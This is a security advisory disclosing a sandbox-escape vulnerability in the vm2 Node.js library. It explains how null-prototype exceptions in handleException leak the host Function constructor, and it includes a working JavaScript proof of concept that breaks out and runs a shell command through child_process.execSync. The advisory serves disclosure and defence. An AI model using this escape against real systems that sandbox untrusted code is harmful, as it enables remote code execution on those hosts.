GHSA-9vg3-4rfj-wgcm
vm2 has Sandbox Breakout Through Null Proto Exception
Details
### Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
In `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object.
### PoC
```js const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` const o = {__proto__: null}; try { throw o; } catch (e) { e.f = Buffer.prototype.inspect o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); } `)); ```
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
Are you affected?
Enter the version of the package you're using.